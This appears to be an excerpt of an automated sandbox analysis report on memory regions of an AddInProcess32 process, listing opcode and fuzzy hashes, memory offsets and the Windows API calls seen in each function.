                • Snapshot File: hcaresult_5_2_6a70000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4f5a9ab29fafac8fb7c27d632268028dfdf72442640f3fe7cff5e82de26f782d
                • Instruction ID: 90b85f223f3745ebaa4b7998568ddccf4319cc3730d450266ee0d59aff2c91c5
                • Opcode Fuzzy Hash: 4f5a9ab29fafac8fb7c27d632268028dfdf72442640f3fe7cff5e82de26f782d
                • Instruction Fuzzy Hash: 364157B1D016188BEB58DF6BDD457DAFAF3AFC9300F14C1AAC50CA6264DB740A868F51
                Memory Dump Source
                • Source File: 00000005.00000002.4530857666.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a70000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 233ccf0f36f14c86b7465e24b8c35845d046ca75f5d2fd133e10a2b782177bdc
                • Instruction ID: 2b456213f209c499c0bd4bc8fffafc24a10b92b6caefff9007a7aeadebc96a40
                • Opcode Fuzzy Hash: 233ccf0f36f14c86b7465e24b8c35845d046ca75f5d2fd133e10a2b782177bdc
                • Instruction Fuzzy Hash: 4C4147B1D016188BEB58CF6BDD457D9FAF3AFC9310F14C1AAD50CA6264EB740A868F50

                Control-flow Graph: function starting at 14ff5f2 (graph rendering not reproduced; one basic block calls CreateWindowExW, another calls 14fd84c)
                Memory Dump Source
                • Source File: 00000005.00000002.4522862776.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_14f0000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b027ca51e745689bcfa756684c477713519d56ac2e14af3889fea8c7a2ea59f2
                • Instruction ID: 781bedc3810b95d02a35a686cdb5986f3c1720e559c6253d1249c938fdd4be0f
                • Opcode Fuzzy Hash: b027ca51e745689bcfa756684c477713519d56ac2e14af3889fea8c7a2ea59f2
                • Instruction Fuzzy Hash: 42917CB2C093899FDB16CFA5C84498DBFB1BF49310F15819FE544AB262D335984ACF61

                Control-flow Graph: function starting at 14fd168 (graph rendering not reproduced; one basic block calls GetModuleHandleW, others call 14fc100, 14fd3f1, 14fd400, 14fc10c, 14f5880, 14fa074 and 14fc11c)
                Memory Dump Source
                • Source File: 00000005.00000002.4522862776.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_14f0000_AddInProcess32.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: 3798efd2dba3188c8dd782cbf609f66c17138b08b87c013e5f62738644ce4850
                • Instruction ID: 589a10dff7283cfbacfc321c6cb9ef437b39503d2787af98e1e0955d200a5b53
                • Opcode Fuzzy Hash: 3798efd2dba3188c8dd782cbf609f66c17138b08b87c013e5f62738644ce4850
                • Instruction Fuzzy Hash: 2B710570A00B058FE724DFAAD54475ABBF1FF88210F108A2ED64697B50D775E845CB91

                Control-flow Graph: function starting at 14fd84c (graph rendering not reproduced; one basic block calls CreateWindowExW)
                APIs
                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 014FF862
                Memory Dump Source
                • Source File: 00000005.00000002.4522862776.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_14f0000_AddInProcess32.jbxd
                Similarity
                • API ID: CreateWindow
                • String ID:
                • API String ID: 716092398-0
                • Opcode ID: d1149db3524826554c455a449f5ac26d6db8001cef3916366f14386f3dfe2fcd
                • Instruction ID: 042a94242541ec757ef571ed27e4481145c26993fce3cd2ebd4c7c3f0d717108
                • Opcode Fuzzy Hash: d1149db3524826554c455a449f5ac26d6db8001cef3916366f14386f3dfe2fcd
                • Instruction Fuzzy Hash: 3D519DB1D003599FDB14CF9AC884ADEBBB5BF48710F64812AE919AB320D775A845CF90

                Control-flow Graph: function starting at 6a6bfc4 (graph rendering not reproduced; one basic block calls LdrInitializeThunk)
                Memory Dump Source
                • Source File: 00000005.00000002.4530644785.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 27f0763542eab4dc8abcc0373cc8f7e775ea1f0d0bc941c6216a2bd4a0f34290
                • Instruction ID: db72c9b9eae64b4549a339f227f796d74e996418b0012a3356a6f5d1ae1cc30b
                • Opcode Fuzzy Hash: 27f0763542eab4dc8abcc0373cc8f7e775ea1f0d0bc941c6216a2bd4a0f34290
                • Instruction Fuzzy Hash: D3413A78904108DFDB44EF9AD484AEDF7B2BF48350F209158E455AB291C771D996CFA0

                Control-flow Graph: function starting at 6a6bf64 (graph rendering not reproduced; one basic block calls LdrInitializeThunk)
                Memory Dump Source
                • Source File: 00000005.00000002.4530644785.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b0aa3e90f90940b625b655f7f7020a2b67629f8a8daa8808894437530c188d28
                • Instruction ID: fb67b2f9f5dfa3721d74485f76b1a6c85fa64b4bef5c6bde6f2c1ee54f8aba7d
                • Opcode Fuzzy Hash: b0aa3e90f90940b625b655f7f7020a2b67629f8a8daa8808894437530c188d28
                • Instruction Fuzzy Hash: 5A4127B8D04208CFDB44DF9AD084AEDF7B2BF48314F248158E405AB2A1C731A996CFA0

                Control-flow Graph: function starting at 6a6be18 (graph rendering not reproduced; one basic block calls LdrInitializeThunk)
                Memory Dump Source
                • Source File: 00000005.00000002.4530644785.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a60000_AddInProcess32.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: b9093bc6407793a78a742aa2734aa26708036365c8cafab3f375812702aa4b77
                • Instruction ID: 185009be7076ef3a0dd3cfe7c8bf89c4cffffc9144dd7812151ef000e8b49c90
                • Opcode Fuzzy Hash: b9093bc6407793a78a742aa2734aa26708036365c8cafab3f375812702aa4b77
                • Instruction Fuzzy Hash: 7E216DB1D012089BEB14DFAAD884BEEFBF6EF89310F149129E514B7291C7704946CB50

                Control-flow Graph: function starting at 14f4834 (graph rendering not reproduced; one basic block calls DuplicateHandle)
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,014F4D76,?,?,?,?,?), ref: 014F4E37
                Memory Dump Source
                • Source File: 00000005.00000002.4522862776.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_14f0000_AddInProcess32.jbxd
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: c732417dc3746fbea918aa55699e4b19b4c5a9522abd66cbf5e9ba25928515d8
                • Instruction ID: db4cbb2683cc65d972e1fe9485d098f22b578b2127963479fac0495d85fd07ed
                • Opcode Fuzzy Hash: c732417dc3746fbea918aa55699e4b19b4c5a9522abd66cbf5e9ba25928515d8
                • Instruction Fuzzy Hash: 7421E3B5900349DFDB10CF9AD984AEEBFF8EB48320F14841AE918A7350D774A954CFA5

                Control-flow Graph: function starting at 14f4daa (graph rendering not reproduced; one basic block calls DuplicateHandle)
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,014F4D76,?,?,?,?,?), ref: 014F4E37
                Memory Dump Source
                • Source File: 00000005.00000002.4522862776.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_14f0000_AddInProcess32.jbxd
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: c73c2d124142da78657a0d23e70f6affb00bf00765ee28a3f4fe5d68e6a35f32
                • Instruction ID: 1dbb3d640a34469833a46ad8656ee0b3876acfdefa6feb92711c8f8190e02ec1
                • Opcode Fuzzy Hash: c73c2d124142da78657a0d23e70f6affb00bf00765ee28a3f4fe5d68e6a35f32
                • Instruction Fuzzy Hash: AF21D2B5900249DFDB10CF9AD984AEEBBF4FB48320F14851AE918A3310C378A954CFA0

                Control-flow Graph: function starting at 6a68d94 (graph rendering not reproduced; one basic block calls LdrInitializeThunk, another calls 6a68790)
                APIs
                • LdrInitializeThunk.NTDLL(00000000), ref: 06A68ED6
                Memory Dump Source
                • Source File: 00000005.00000002.4530644785.0000000006A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a60000_AddInProcess32.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: d7c93ad22c7e9e2ec774921021a8f2fd7ac59dfc5de5afc226a3aec56643178e
                • Instruction ID: 9e688eeadbbd454c9c605f462a2247752f1abc52b7525fd69660f895f64ad322
                • Opcode Fuzzy Hash: d7c93ad22c7e9e2ec774921021a8f2fd7ac59dfc5de5afc226a3aec56643178e
                • Instruction Fuzzy Hash: F4119A74E012198FEB44EBAAD884AADF7B9FF88304F108225E804A7251D775E842CB60

                Control-flow Graph: function starting at 14fd5b8 (graph rendering not reproduced; one basic block calls LoadLibraryExW)
                APIs
                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014FD439,00000800,00000000,00000000), ref: 014FD62A
                Memory Dump Source
                • Source File: 00000005.00000002.4522862776.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_14f0000_AddInProcess32.jbxd
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                • Opcode ID: b22ff4bde13a480d25c0bd142eb1b68b89a90c66f913f53d06fc9414d531416a
                • Instruction ID: 238ebfc609334e1bdb1a538ee91994f184e8f0649794a175969d26dac5745a93
                • Opcode Fuzzy Hash: b22ff4bde13a480d25c0bd142eb1b68b89a90c66f913f53d06fc9414d531416a
                • Instruction Fuzzy Hash: 961106B6C002099FDB14CF9AD844ADEFBF4EB88310F14852EE519A7310C375A545CFA5

                Control-flow Graph: function starting at 14fc148 (graph rendering not reproduced; one basic block calls LoadLibraryExW)
                APIs
                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014FD439,00000800,00000000,00000000), ref: 014FD62A
                Memory Dump Source
                • Source File: 00000005.00000002.4522862776.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_14f0000_AddInProcess32.jbxd
                Similarity
                • API ID: LibraryLoad
                • String ID:
                • API String ID: 1029625771-0
                • Opcode ID: 70d35ed18df7123f5b09d2f6f768beeabc6a0b1a03df98dfe4d4641342e0fa42
                • Instruction ID: bfe435597dc36d1f3df19d2a92cf13cafbf2edcac2226d71562774cbb61671d1
                • Opcode Fuzzy Hash: 70d35ed18df7123f5b09d2f6f768beeabc6a0b1a03df98dfe4d4641342e0fa42
                • Instruction Fuzzy Hash: 2111D3B6D043099FDB10DF9AD444A9EFBF4EB88710F10842EE619A7310C375A545CFA5

                Control-flow Graph: function starting at 14fc100 (graph rendering not reproduced; one basic block calls GetModuleHandleW)
                APIs
                • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,014FD184), ref: 014FD3BE
                Memory Dump Source
                • Source File: 00000005.00000002.4522862776.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_14f0000_AddInProcess32.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: ee5de96f5e73a732c90783948836fd321b5710f20fc17915b4d821df812949bd
                • Instruction ID: 73dd5110342a0e05e5c15aa91b6199f003d9f7c200f13367c5152b2d002ec9eb
                • Opcode Fuzzy Hash: ee5de96f5e73a732c90783948836fd321b5710f20fc17915b4d821df812949bd
                • Instruction Fuzzy Hash: 9411F0B6C007498BDB10DF9AC444B9EFBF4EB88224F10845ED619A7310D3B5A545CFA1
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cdecc3f1c08cee7dd425adca63f874a3d8d5d928ff79747e9ec4281178eb5019
                • Instruction ID: 17cc602b3d3cc5f17227578944a27c116d6254cc2c49d888ff6c82efd8bf0a3f
                • Opcode Fuzzy Hash: cdecc3f1c08cee7dd425adca63f874a3d8d5d928ff79747e9ec4281178eb5019
                • Instruction Fuzzy Hash: 8E520F74A00619CFEB149BE4C864BAEBB72FB98340F1080ADC20A6B355DF359D85DF65
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e760b90f3873fc5ff710b5b2a7cc0a309f7f54dc3487915b0fe96c717b96e949
                • Instruction ID: d20be58af75e43b8da187adf741c16e470d8c5e6e1461ebdd30bd26e89271c93
                • Opcode Fuzzy Hash: e760b90f3873fc5ff710b5b2a7cc0a309f7f54dc3487915b0fe96c717b96e949
                • Instruction Fuzzy Hash: 22123930A00209DFCB15DF69D988AAEBBF2FF88358F148559EA15DB261DB31ED41CB50
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 07cf0990622ea5c3f37566e55c5410ba9e7fbe04df44d96888ee1f9e5e30d1cc
                • Instruction ID: c2da2ced47c7dc06c84f4a837de5e8eb1d003e1ac6223350abd125b1a2a57ce6
                • Opcode Fuzzy Hash: 07cf0990622ea5c3f37566e55c5410ba9e7fbe04df44d96888ee1f9e5e30d1cc
                • Instruction Fuzzy Hash: 6732B674A00219CFCB54DF64ED88A9DBBB2FF88301F2095A9D90AA7354DB786D45CF84
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7b27188300a079d5537f3e7a8d99613808e4c9f85170f43d38cf0bed8e94b803
                • Instruction ID: 946df1c085fc0401f6a1b4c5572f6ba8316cc232e19677f04490c35923c884c1
                • Opcode Fuzzy Hash: 7b27188300a079d5537f3e7a8d99613808e4c9f85170f43d38cf0bed8e94b803
                • Instruction Fuzzy Hash: 9722B674A00219CFCB54DF64ED88A9DBBB2FF88301F2095A9D90AA7354DB786D45CF84
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e6e4f9b6e4bd9a0a46fa7ac4e447cb607526bd3f1dd24824b4e61108ce2cf616
                • Instruction ID: 0d1d45d8cf706403cba2c7c99edb9b2ecffc3b3fdf43e0eb0a6286f6598aa3bc
                • Opcode Fuzzy Hash: e6e4f9b6e4bd9a0a46fa7ac4e447cb607526bd3f1dd24824b4e61108ce2cf616
                • Instruction Fuzzy Hash: 4CF12B71E00615CFCB05CFA9C988AADBBF2FF88394B168159E519AB361CB35EC51CB50
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 835cbc6d3910e9ed0114b12c97a2f3c1d23a20b92069af67aa9b84b4975002dd
                • Instruction ID: 6d6d53db5b8a9ade95f53a3d315a7fcea3525a82ebcb1a62c934c2aaafb83690
                • Opcode Fuzzy Hash: 835cbc6d3910e9ed0114b12c97a2f3c1d23a20b92069af67aa9b84b4975002dd
                • Instruction Fuzzy Hash: E4B18171B056028FDB145E29C96CB3D769AEF856C4F14046EE702CF3A1EB66CC89C742
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b255da63c2dc570b32bf162479f6b6df4c5a1d7e46444a857b7f8074fb481cef
                • Instruction ID: 8e6913b60a094274f5ef7cb4c028182d1f334b5e684d148d0fb1cb570f1c0787
                • Opcode Fuzzy Hash: b255da63c2dc570b32bf162479f6b6df4c5a1d7e46444a857b7f8074fb481cef
                • Instruction Fuzzy Hash: 14B1B031B042198FDB259F34C858B3EBBE2EB89394F548829E606DB391DB75CC05CB91
                Memory Dump Source
                • Source File: 00000005.00000002.4530857666.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a70000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: eec366f62aac85d5440a8f18ff04036b61287f618bad17a8c923879043f0eee6
                • Instruction ID: 748d721787cd99cd24cb2b7b812cf35ee5a80b96ed8898f728db5ef7a6e5d1dd
                • Opcode Fuzzy Hash: eec366f62aac85d5440a8f18ff04036b61287f618bad17a8c923879043f0eee6
                • Instruction Fuzzy Hash: 8581CD30B101468FCB58EF79DC54A6E7BF6EF88650B1585A9E416DB3A1DB30DD02CBA0
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 064381d6b310f51bf6a2ac2d1128c88cec1200182d3e971b49f916ce6b8e6e78
                • Instruction ID: edbdf876e02a9edf846b1034bcbb786ce6f1d454bb8b71f595f92ca44d070cc5
                • Opcode Fuzzy Hash: 064381d6b310f51bf6a2ac2d1128c88cec1200182d3e971b49f916ce6b8e6e78
                • Instruction Fuzzy Hash: D6817235B04505CFCB14CFA9C88CA7AB7B2FF88284B948169D616FB3A5D731E841CB90
                Memory Dump Source
                • Source File: 00000005.00000002.4530857666.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a70000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5eedea7ffa1065edcf0ec1abf3d6629dce24d3d42ba58536460e9c36cd4cc543
                • Instruction ID: 0612d006e88a01ca763e3e5ccc0b0992b39a8c82dceb092328a1d8572b4f0224
                • Opcode Fuzzy Hash: 5eedea7ffa1065edcf0ec1abf3d6629dce24d3d42ba58536460e9c36cd4cc543
                • Instruction Fuzzy Hash: 97717231F113199BDB55EFA4C8506AEBBF6AFC8610F14852AE405BB380DF349D06CBA5
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: eaa89fb84c919e8717cc26e6e5aa1869bd1d989ae2b8c5be621a1ffc3c54a47d
                • Instruction ID: 577dfe8366b64a891b43ef0df16979c0398c1f6b7570a6150018e9979327326f
                • Opcode Fuzzy Hash: eaa89fb84c919e8717cc26e6e5aa1869bd1d989ae2b8c5be621a1ffc3c54a47d
                • Instruction Fuzzy Hash: CA711A35B006058FCB15EF2CC898A79BBE6EF49698B1504A5EA05CB3B1DB71DC41CF91
                Memory Dump Source
                • Source File: 00000005.00000002.4530857666.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a70000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b56b29d3c2d53c369f000a99373e672058a7b896288bdfaeddbb5e0b889f09ef
                • Instruction ID: 711da0f459a8fcfe4aea9c472cfa6b7d453e71b20faacecea36c3d42a968f7fe
                • Opcode Fuzzy Hash: b56b29d3c2d53c369f000a99373e672058a7b896288bdfaeddbb5e0b889f09ef
                • Instruction Fuzzy Hash: D781A074E412299FDB65DF25DD54BEDBBB2BB89300F1081EAD819A7250DB305E81CF80
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4b3d2d975ef898d088d64d5e11d95bbee1f08e06cd5572d46dd1acc2b220747d
                • Instruction ID: ae72a2e613a648f8d0d70ffd72a1e8380a563905feb0d7a4a8e37f47077a1768
                • Opcode Fuzzy Hash: 4b3d2d975ef898d088d64d5e11d95bbee1f08e06cd5572d46dd1acc2b220747d
                • Instruction Fuzzy Hash: 7E518A708A225E9F97243B30ADAD93EFAA4FF0F7A77517D01A11F864899B3014A4CB54
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 962c12470c25004f563a0069356cde4db61c33fede7baed4af3113b9917c1c98
                • Instruction ID: a9fc056f41be9e7d33823b1edb446b884634178ce0ee6d1ccb3a448cef7430d9
                • Opcode Fuzzy Hash: 962c12470c25004f563a0069356cde4db61c33fede7baed4af3113b9917c1c98
                • Instruction Fuzzy Hash: 745189708A625E8F97243B30ADAD93EFAA4FF0F7A77417D00A11F864899B7004A4CF54
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2d9a54a2d203ab7ecd7d6284282655b4bc282ab569f3b4de4c8c6807d036e5ad
                • Instruction ID: 37231ff02661850fc43515171383a089bc8e4392930114f7a08ffa9db4c9a843
                • Opcode Fuzzy Hash: 2d9a54a2d203ab7ecd7d6284282655b4bc282ab569f3b4de4c8c6807d036e5ad
                • Instruction Fuzzy Hash: F5510570E012488BDB04DFA9D988AAEBBF2FF89340F649529D504BB354DB789842CF54
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f5ba7599d13d50e5f6b3ebf382c1475811401cfb42a0cb56e7505f61e5d2d9d9
                • Instruction ID: fc4f8fc6567d7f0255b93691f7de2322b05d5067f4e3401069d210bb0b51f181
                • Opcode Fuzzy Hash: f5ba7599d13d50e5f6b3ebf382c1475811401cfb42a0cb56e7505f61e5d2d9d9
                • Instruction Fuzzy Hash: 50511F74E01218CFEB14DFA5D998AAEFBB2FF88300F208529E905AB395DB755945CF40
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8699c3118584df8e64ef4cc4a31a5a2acfcdfe81df26f437dbec721c43da4d29
                • Instruction ID: e0583b696c8ed861ef3f70d4e374adadaafb03e5a89cf4d7f2bcbcfe3a0b80b9
                • Opcode Fuzzy Hash: 8699c3118584df8e64ef4cc4a31a5a2acfcdfe81df26f437dbec721c43da4d29
                • Instruction Fuzzy Hash: 72519374E01218DFDB54DFA9D9849DDBBF2BF89300F20816AE819AB364DB309801CF54
                Memory Dump Source
                • Source File: 00000005.00000002.4530857666.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a70000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 846b59eba108cb0816c0ce8a114ec0e3d54da59d69518f78fe115b25fdc508e3
                • Instruction ID: a750e31cc2f47322a59bdac52d24c5dcb2bee90419d4b65162c5d8097a6a1512
                • Opcode Fuzzy Hash: 846b59eba108cb0816c0ce8a114ec0e3d54da59d69518f78fe115b25fdc508e3
                • Instruction Fuzzy Hash: 1A412B3590125ACFDB14AF71D85C7FEBBB1EB4A312F506869D502672D4CB780A48CFA0
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c437d3fbeba2f207203cdec00755f5df3680e3b1af2c7b3f5044754e24554fab
                • Instruction ID: 3c801d731690c540a143eb151685751019b7000445f089bf4ae9d112ec7b99dc
                • Opcode Fuzzy Hash: c437d3fbeba2f207203cdec00755f5df3680e3b1af2c7b3f5044754e24554fab
                • Instruction Fuzzy Hash: E451A474E01208CFCB48DFA9D99499DBBB2FF89300B209569E815BB324DB35AD42CF54
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bda092bc730de4598daabc738333dabe2adcb5cbbd7881447ec684beb4fb8c71
                • Instruction ID: 21944f64af7b351d1515d337d0c1b78a25d2a55bcfee18e350fe3ac4d453658d
                • Opcode Fuzzy Hash: bda092bc730de4598daabc738333dabe2adcb5cbbd7881447ec684beb4fb8c71
                • Instruction Fuzzy Hash: DF41AF31A0424ADFCF15CFA4C848BAEBBF2EF89394F008155EA15AB251D3B5E954CB90
                Memory Dump Source
                • Source File: 00000005.00000002.4523593575.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_2f60000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f9baf45b69bd6cd675d899c689c6bb5dc47f5f7235ab104a78ed3e214ad32f3d
                • Instruction ID: 3fa2ae4925d69fd84f1f1f0d5535707b1b85351e8417290d5e5f2c425f4a3965
                • Opcode Fuzzy Hash: f9baf45b69bd6cd675d899c689c6bb5dc47f5f7235ab104a78ed3e214ad32f3d
                • Instruction Fuzzy Hash: D241AC35B002089FDB159B78D858ABEBBF6EBC8651F148569D606E7391CE359C02CBA0
                Memory Dump Source
                • Source File: 00000005.00000002.4530857666.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_6a70000_AddInProcess32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 86a8eacc1075eaf21272a2ed093debe0b501bd8710a93ee46709826df4ebe325
